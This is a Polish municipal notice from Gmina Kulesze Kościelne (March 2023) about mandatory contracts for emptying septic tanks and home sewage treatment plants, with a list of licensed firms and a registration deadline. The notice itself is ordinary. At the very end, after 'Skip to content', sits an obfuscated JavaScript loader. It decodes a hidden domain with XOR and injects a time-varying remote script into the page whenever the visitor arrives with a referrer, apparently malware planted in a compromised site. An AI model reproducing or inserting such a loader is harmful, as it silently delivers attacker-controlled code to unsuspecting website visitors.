Aktualności

Właściciele nieruchomości, którzy nie mają jeszcze podpisanych umów na opróżnianie zbiorników bezodpływowych oraz przydomowych oczyszczalni ścieków powinni uczynić to niezwłocznie

mar 16, 2023 | Aktualności

W związku ze zmianą przepisów ustawy o utrzymaniu czystości i porządku w gminach od 1 stycznia 2023 r. na gminy nałożono obowiązek prowadzenia ewidencji zbiorników bezodpływowych, ewidencji przydomowych oczyszczalni ścieków oraz prowadzenia kontroli w zakresie ich regularnego opróżniania.

Zgodnie z w/w ustawą właściciel nieruchomości, na której znajduje się zbiornik bezodpływowy lub przydomowa oczyszczalnia ścieków, zobowiązany jest do zawarcia umowy z przedsiębiorcą posiadającym zezwolenie na prowadzenie działalności w zakresie opróżniania zbiorników bezodpływowych lub osadników w instalacjach przydomowych oczyszczalni ścieków i transportu nieczystości ciekłych, a w przypadku kontroli do okazania takiej umowy oraz dowodów potwierdzających wywóz nieczystości np. poprzez przedłożenie rachunku za wywóz nieczystości ciekłych.

Właściciele nieruchomości, którzy nie mają jeszcze podpisanych umów na opróżnianie zbiorników bezodpływowych oraz przydomowych oczyszczalni ścieków powinni uczynić to niezwłocznie.

Ważne jest, aby posiadane rachunki potwierdzały regularność wywozu szamba (z częstotliwością uniemożliwiającą wydobywanie się nieczystości na zewnątrz zbiornika, lecz nie rzadziej niż raz na rok). W przypadku posiadania przydomowych oczyszczalni ścieków, należy również pamiętać o obowiązku pozbywania się osadów ściekowych (zgodnie z instrukcją eksploatacji przydomowej oczyszczalni ścieków), co musi zostać również odpowiednio udokumentowane, tj. poprzez podpisanie umowy na wywóz osadów ściekowych oraz posiadanie dowodów uiszczania opłaty za w/w usługę.

Należy podkreślić, że usługę wywozu ścieków mogą wykonywać jedynie przedsiębiorcy posiadający zezwolenie na prowadzenie działalności w zakresie opróżniania zbiorników bezodpływowych i transportu nieczystości ciekłych. Na terenie Gminy Kulesze Kościelne takie usługi mogą świadczyć następujące firmy:

1. Zakład Wodociągów, Kanalizacji i Energetyki Cieplnej Sp. z o.o.

 ul. 1 Maja 6, 18-200 Wysokie Mazowieckie, tel. 86/275 08 88, lub 86/275 20 45

2. Anastazja Bańska WC SERWIS Sp. z o.o.. Spółka Komandytowa

41-808 Zabrze ul. Szybowa 2, tel. 32/278 45 31

3. Spółdzielnia Kółek Rolniczych w Sokołach, ul. Kolejowa 31, 18-218 Sokoły, 

tel. 86 476 31 24

4. TOI TOI Sp. z o.o. ul. Płochocińska 29, 03-044 Warszawa,

tel. 22/6145979

5. mToilet Sp. z o.o. ul. Toruńska 31, 03-226 Warszawa,

tel. 488488489

6. Usługi Transportowe Joanna Urbańska Dębniki 11, 18-312 Rutki Kossaki  tel. 503080352

Wobec powyższego właściciele posesji na których znajduje się zbiornik bezodpływowy lub wykonano przydomową oczyszczalnię, mają obowiązek zgłoszenia tego faktu. Zgłoszeń aktualizacyjnych należy dokonać na załączonym formularzu.

Zgłoszeń można dokonać w Urzędzie Gminy pok. nr 7, przesłać pocztą na adres Urzędu Gminy, elektronicznie podpisane profilem zaufanym bądź przekazać konserwatorowi wodociągu podczas odczytu wodomierza.

Zgłoszeń należy dokonać do 31 maja 2023 roku.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);